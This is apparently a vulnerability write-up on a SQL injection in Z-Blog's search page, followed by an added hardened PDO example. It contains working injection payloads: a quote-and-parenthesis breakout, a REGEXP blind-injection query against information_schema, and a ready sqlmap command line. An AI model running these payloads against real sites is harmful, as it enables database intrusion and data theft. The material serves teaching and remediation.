The problem lies in /zb_system/function/c_system_common.php:

```php
function GetVars($name, $type = 'REQUEST') {
    if ($type == 'ENV')     { $array = &$_ENV; }
    if ($type == 'GET')     { $array = &$_GET; }
    if ($type == 'POST')    { $array = &$_POST; }
    if ($type == 'COOKIE')  { $array = &$_COOKIE; }
    if ($type == 'REQUEST') { $array = &$_REQUEST; }
    if ($type == 'SERVER')  { $array = &$_SERVER; }
    if ($type == 'SESSION') { $array = &$_SESSION; }
    if ($type == 'FILES')   { $array = &$_FILES; }
    if (isset($array[$name])) {
        var_dump($array[$name]); // debug output as it appears in the posted code
        return $array[$name];    // the value is returned with no escaping at all
    } else {
        return null;
    }
}
```
After the GET data passes through this "filter" it enters dbsql.php. In the front-end search box, enter the injection statement. Here h is the character being searched for:

    h%') and 1)#

The 1 can be replaced with an SQL injection; here a REGEXP blind injection is used:

    h%') and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="zblog" AND table_name REGEXP '^[a-z]' limit 0,1))#

Data is read out character by character. Manual injection is too painful, so use sqlmap:

    python sqlmap.py -u "<site address>/search.php?q=<a character that can be searched successfully>" -p q --prefix "%')" --suffix ")#"
I want to ask: why convert \' back? Isn't that heading straight for injection? Zblog/zb_system/function/c_system_base.php:
```php
function _stripslashes(&$val) {
    if (!is_array($val)) return stripslashes($val);
    foreach ($val as $k => &$v) $val[$k] = _stripslashes($v);
    return $val;
}
// Undoes the escaping that magic_quotes_gpc added, so the raw quote
// character reaches the query unescaped.
if (get_magic_quotes_gpc()) {
    _stripslashes($_GET);
    _stripslashes($_POST);
    _stripslashes($_COOKIE);
}
```
Solution: escape the input parameters with mysql_real_escape_string() or addslashes(), or use str_replace() to replace certain keywords.
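The two passages above (the unescaped value returned by GetVars() and the magic-quotes stripping in c_system_base.php) have the same root cause: the search term is spliced into SQL text, so whether or not a backslash was added earlier decides whether the query is safe. The following is an added example, not Z-Blog's own code, showing the search lookup written with a bound parameter, which does not depend on addslashes()/magic_quotes state at all. The table name (zbp_post) and column names (log_ID, log_Title, log_Content) are assumptions for illustration; the real dbsql.php query is not reproduced here.

```php
<?php
// Added example, not Z-Blog's own code. Table and column names are assumed.
declare(strict_types=1);

// Make "%" and "_" in the user's term match literally inside a LIKE pattern.
// "!" is used as the ESCAPE character because it needs no backslash quoting
// in either MySQL or SQLite string literals.
function escape_like(string $term): string
{
    return str_replace(['!', '%', '_'], ['!!', '!%', '!_'], $term);
}

// Hardened search: the term travels to the database as a bound value, so a
// quote or a closing parenthesis inside it can never terminate the SQL
// string literal or append conditions. No keyword blacklist is needed.
function search_posts(PDO $pdo, string $q): array
{
    $sql = "SELECT log_ID, log_Title FROM zbp_post "
         . "WHERE log_Title LIKE :title_pat ESCAPE '!' "
         . "   OR log_Content LIKE :content_pat ESCAPE '!'";
    $pattern = '%' . escape_like($q) . '%';
    $stmt = $pdo->prepare($sql);
    $stmt->execute([':title_pat' => $pattern, ':content_pat' => $pattern]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Self-contained demonstration on an in-memory SQLite database with
// constructed sample rows. The third lookup uses the page's own search
// payload as the term; with binding it is just text to match, and the
// query stays well-formed instead of gaining an extra condition.
function demo(): array
{
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE zbp_post (log_ID INTEGER PRIMARY KEY, log_Title TEXT, log_Content TEXT)');
    $ins = $pdo->prepare('INSERT INTO zbp_post (log_Title, log_Content) VALUES (?, ?)');
    $rows = [
        ['hello world', 'first post'],
        ['100% done',   'second post'],
        ['misc',        'nothing here'],
    ];
    foreach ($rows as $row) {
        $ins->execute($row);
    }
    return [
        'plain'    => count(search_posts($pdo, 'h')),            // ordinary term
        'wildcard' => count(search_posts($pdo, '100%')),         // literal percent sign
        'payload'  => count(search_posts($pdo, "h%') and 1)#")), // treated as plain text
    ];
}

print_r(demo());
```

Two practical notes on the page's suggested fixes: mysql_real_escape_string() belongs to the old mysql extension, which was removed in PHP 7.0, so it is not available on current installations, and escaping with addslashes() only protects the single-quoted string context it was written for, as the magic-quotes stripping above shows when that assumption is later undone. Replacing keywords with str_replace() is a fragile filter rather than a fix. Binding the value, as in search_posts(), keeps data and SQL separate regardless of what characters the term contains.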